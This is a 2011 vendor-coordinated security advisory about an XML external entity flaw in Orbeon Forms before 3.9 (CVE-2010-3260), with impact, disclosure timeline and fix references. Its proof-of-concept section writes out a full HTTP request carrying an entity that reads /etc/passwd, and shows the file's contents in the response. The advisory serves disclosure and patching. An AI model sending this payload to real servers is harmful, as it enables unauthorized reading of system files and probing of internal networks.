Orbeon Forms XML Entity Dereferencing (SS-2011-004)

Apr 14, 2011

  • Title: Orbeon Forms XML Entity Dereferencing (SS-2011-004)
  • Version: 1.0
  • Issue type: XML Entity Dereferencing
  • Affected vendor: Orbeon
  • Release date: 14/04/2011
  • Discovered by: Daniel Grzelak and Rohan Stelling


Summary

stratsec has identified a XML external entity dereferencing vulnerability present in Orbeon Forms. The issue can be exploited by a remote attacker to access internal network resources and local files subject to OS level permissions.

Description

Orbeon Forms is a Java based web form application featuring as-you-type input validation. The application consists of client and server side components which commutate via an XForms web service.
 
When parsing XML requests the XForms service dereferences external entities, allowing an attacker to specify a URI of a local resource (typically a file path or HTTP page) to include the resources contents where user input is expected. The specified resource is subsequently returned in the application’s response.
 
Impact

A remote attacker can read arbitrary files on the server, limited only by the system level permissions enforced by the operating system. It may also be possible to access internal network resources, such as unauthenticated HTTP pages or perform network scanning.

Affected products

Orbeon Forms < 3.9

Proof of concept

The issue is present in the http://<hostname>/orbeon/xforms-server page, which receives XML formatted text in the body of HTTP post requests.

The issue can be reproduced by editing a form hosted by the application and intercepting requests to http://<hostname>/orbeon/xforms-server. By inserting a entity declaration, such as <!ENTITY file SYSTEM "file:///etc/passwd" > and substituting user input with the entity reference (ie &file;) it is possible to retrieve the contents of the file as shown below:

POST /orbeon/xforms-server HTTP/1.1 Host: 127.0.0.1:8080 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 X-Requested-With: XMLHttpRequest Content-Type: application/xml; charset=UTF-8 Referer: http://127.0.0.1:8080/orbeon/fr/orbeon/bookshelf/new Cookie: JSESSIONID=<SESSIONID>
Pragma: no-cache Cache-Control: no-cache Content-Length: 561
<!DOCTYPE xxforms:event-request
[<!ENTITY nbsp "&#160;"><!ENTITY file SYSTEM "file:///etc/passwd" >]>
<xxforms:event-request  xmlns:xxforms="http://orbeon.org/oxf/xml/xforms">
    <xxforms:static-state>pers:7A8B5BFB-F697-64CB-8D6E-577EA083BB12</xxforms:static-state>
    <xxforms:dynamic-state>pers:7C702384-BE11-3E06-99B2-144D90C301A4</xxforms:dynamic-state>
    <xxforms:action>
        <xxforms:event name="xxforms-value-change-with-focus-change" source-control-id="author-control">sdfgs&file;dfg</xxforms:event>
    </xxforms:action>
</xxforms:event-request>

A typical server response shown below (site-specific users have been sanitized),

HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Wed, 18 Aug 2010 21:28:21 GMT Expires: Wed, 18 Aug 2010 21:28:21 GMT Cache-Control: public Pragma:  Content-Type: application/xml;charset=utf-8 Date: Wed, 18 Aug 2010 21:28:21 GMT Content-Length: 5524
<?xml version="1.0" encoding="utf-8"?><xxf:event-response xmlns:xxf="http://orbeon.org/oxf/xml/xforms"><xxf:dynamic-state>pers:CD0F4313-45A8-84EF-4CE6-1C1F44363E49</xxf:dynamic-state><xxf:action><xxf:control-values><xxf:control id="author-control" valid="true">sdfgsroot:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
dfg</xxf:control></xxf:control-values>
...
</xxf:event-response>

Solution

The vendor has informed stratsec that this issue was resolved in Orbeon Forms 3.9.0 Release Candidate 1. Note that stratsec has not assessed the vendor’s solution.

Response timeline

  • 31/08/2010 - Vendor notified.
  • 3/09/2010 - Vendor acknowledges receipt of advisory.
  • 3/09/2010 - Vendor confirms issue presence.
  • 4/12/2010 - Vendor confirms fix applied to code base.
  • 9/12/2010 – Vendor advised advisory publication is imminent.
  • 11/03/2011 –Orbeon Forms 3.9.0 Release Candidate 1 released which addresses this issue.
  • 14/04/2011 – This advisory published.


References

Vendor acknowledgement: http://wiki.orbeon.com/forms/doc/developer-guide/release-notes/39#TOC-Security
Vendor patch: https://github.com/orbeon/orbeon-forms/commit/aba6681660f65af7f1676434da68c10298c30200
CVE item: CVE-2010-3260

Download advisory: SS-2011-004 stratsec Orbeon Forms XML Entity Advisory v1.0.pdf